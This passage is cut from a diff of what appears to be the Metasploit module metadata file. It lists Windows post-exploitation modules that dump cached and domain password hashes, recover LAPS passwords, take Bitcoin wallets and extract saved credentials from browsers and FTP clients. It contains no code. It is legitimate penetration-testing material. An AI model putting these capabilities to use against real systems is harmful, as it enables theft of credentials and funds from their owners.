"post_windows/gather/arp_scanner": { + "name": "Windows Gather ARP Scanner", + "fullname": "post/windows/gather/arp_scanner", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will perform an ARP scan for a given IP range through a\n Meterpreter session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/arp_scanner.rb", + "is_install_path": true, + "ref_name": "windows/gather/arp_scanner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + 
"SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/avast_memory_dump": { + "name": "Avast AV Memory Dumping Utility", + "fullname": "post/windows/gather/avast_memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "DLL_Cool_J" + ], + "description": "This module leverages an Avast Anti-Virus memory dump utility that is shipped\n by default with Avast Anti-Virus Home software suite.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/avast_memory_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/avast_memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bitcoin_jacker": { + "name": "Windows Gather Bitcoin Wallet", + "fullname": "post/windows/gather/bitcoin_jacker", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "illwill ", + "todb " + ], + "description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. 
Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/bitcoin_jacker.rb", + "is_install_path": true, + "ref_name": "windows/gather/bitcoin_jacker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bitlocker_fvek": { + "name": "Bitlocker Master Key (FVEK) Extraction", + "fullname": "post/windows/gather/bitlocker_fvek", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Danil Bazin " + ], + "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n or can be generated, dump the Bitlocker master key (FVEK)", + "references": [ + "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc", + "URL-https://web.archive.org/web/20170914195545/http://www.hsc.fr/ressources/outils/dislocker/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-03 12:57:40 +0000", + "path": "/modules/post/windows/gather/bitlocker_fvek.rb", + "is_install_path": true, + "ref_name": "windows/gather/bitlocker_fvek", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/bloodhound": { + "name": 
"BloodHound Ingestor", + "fullname": "post/windows/gather/bloodhound", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h4ng3r ", + "h00die" + ], + "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more.\n With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly\n identify within an Active Directory environment.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/bloodhound.rb", + "is_install_path": true, + "ref_name": "windows/gather/bloodhound", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "sharphound" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/cachedump": { + "name": "Windows Gather Credential Cache Dump", + "fullname": "post/windows/gather/cachedump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Maurizio Agazzini ", + "mubix " + ], + "description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. 
The default setting on Windows is to store\n the last ten successful logins.", + "references": [ + "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/cachedump.rb", + "is_install_path": true, + "ref_name": "windows/gather/cachedump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/checkvm": { + "name": "Windows Gather Virtual Environment Detection", + "fullname": "post/windows/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Aaron Soto " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n and Parallels.", + "references": [ + "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf", + "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf", + "URL-https://evasions.checkpoint.com/techniques/registry.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "windows/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/adi_irc": { + "name": "Adi IRC credential gatherer", + "fullname": "post/windows/gather/credentials/adi_irc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on AdiIRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/adi_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/adi_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/aim": { + "name": "Aim credential gatherer", + "fullname": "post/windows/gather/credentials/aim", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Aim credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/aim.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/aim", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/avira_password": { + "name": "Windows Gather Avira Password Extraction", + "fullname": "post/windows/gather/credentials/avira_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Robert Kugler / robertchrk" + ], + "description": "This module extracts the weakly hashed password\n which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/avira_password.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/avira_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + 
"crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/bulletproof_ftp": { + "name": "Windows Gather BulletProof FTP Client Saved Password Extraction", + "fullname": "post/windows/gather/credentials/bulletproof_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "juan vazquez " + ], + "description": "This module extracts information from BulletProof FTP Bookmarks files and store\n retrieved credentials in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/bulletproof_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/carotdav_ftp": { + "name": "CarotDAV credential gatherer", + "fullname": "post/windows/gather/credentials/carotdav_ftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on CarotDAV FTP Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/carotdav_ftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/chrome": { + "name": "Chrome credential gatherer", + "fullname": "post/windows/gather/credentials/chrome", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Chrome in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/chrome.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/chrome", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/comodo": { + "name": "Comodo credential gatherer", + "fullname": "post/windows/gather/credentials/comodo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Comodo on a remote Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/comodo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/comodo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/coolnovo": { + "name": "Coolnovo credential gatherer", + "fullname": "post/windows/gather/credentials/coolnovo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Coolnovo credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/coolnovo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/coolnovo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/coreftp": { + "name": "Windows Gather CoreFTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/coreftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. 
They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/coreftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/coreftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/credential_collector": { + "name": "Windows Gather Credential Collector", + "fullname": "post/windows/gather/credentials/credential_collector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "tebo " + ], + "description": "This module harvests credentials found on the host and stores them in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/credential_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/credential_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/digsby": { + "name": "Digsby credential gatherer", + "fullname": "post/windows/gather/credentials/digsby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + 
"Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Digsby credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/digsby.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/digsby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/domain_hashdump": { + "name": "Windows Domain Controller Hashdump", + "fullname": "post/windows/gather/credentials/domain_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. 
It saves all of the captured password\n hashes, including historical ones.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/domain_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/dynazip_log": { + "name": "Windows Gather DynaZIP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/dynazip_log", + "aliases": [], + "rank": 300, + "disclosure_date": "2001-03-27", + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 
98 and Windows Me.", + "references": [ + "CVE-2001-0152", + "MSB-MS01-019", + "PACKETSTORM-24543", + "URL-https://support.microsoft.com/en-us/kb/265131" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/dynazip_log", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/dyndns": { + "name": "Windows Gather DynDNS Client Password Extractor", + "fullname": "post/windows/gather/credentials/dyndns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shubham Dawra ", + "sinn3r " + ], + "description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decode the password field. 
The original copy of the config file is also\n saved to disk.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/dyndns.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/dyndns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_cred_store": { + "name": "Windows Gather Credential Store Enumeration and Decryption Module", + "fullname": "post/windows/gather/credentials/enum_cred_store", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. 
It cannot decrypt Domain Network Passwords, but will\n display the username and location.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_cred_store", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_laps": { + "name": "Windows Gather Credentials Local Administrator Password Solution", + "fullname": "post/windows/gather/credentials/enum_laps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_laps.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_laps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/enum_picasa_pwds": { + "name": 
"Windows Gather Google Picasa Password Extractor", + "fullname": "post/windows/gather/credentials/enum_picasa_pwds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Unknown", + "Sil3ntDre4m " + ], + "description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/enum_picasa_pwds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/epo_sql": { + "name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials", + "fullname": "post/windows/gather/credentials/epo_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nathan Einwechter " + ], + "description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. 
They are encrypted with AES-128-ECB and a static key.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/epo_sql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/epo_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/filezilla_server": { + "name": "Windows Gather FileZilla FTP Server Credential Collection", + "fullname": "post/windows/gather/credentials/filezilla_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "g0tmi1k" + ], + "description": "This module will collect credentials from the FileZilla FTP server if installed.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/filezilla_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/flashfxp": { + "name": "Windows Gather FlashFXP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/flashfxp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module 
extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/flashfxp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/flashfxp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/flock": { + "name": "Flock credential gatherer", + "fullname": "post/windows/gather/credentials/flock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Flock on a remote Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/flock.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/flock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ftpnavigator": { + "name": "Windows Gather FTP Navigator Saved Password Extraction", + "fullname": "post/windows/gather/credentials/ftpnavigator", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ftpnavigator", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ftpx": { + "name": "Windows Gather FTP Explorer (FTPX) Credential Extraction", + "fullname": "post/windows/gather/credentials/ftpx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ftpx.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ftpx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/gadugadu": { + "name": "Gadugadu credential gatherer", + "fullname": "post/windows/gather/credentials/gadugadu", + "aliases": [], + "rank": 300, + 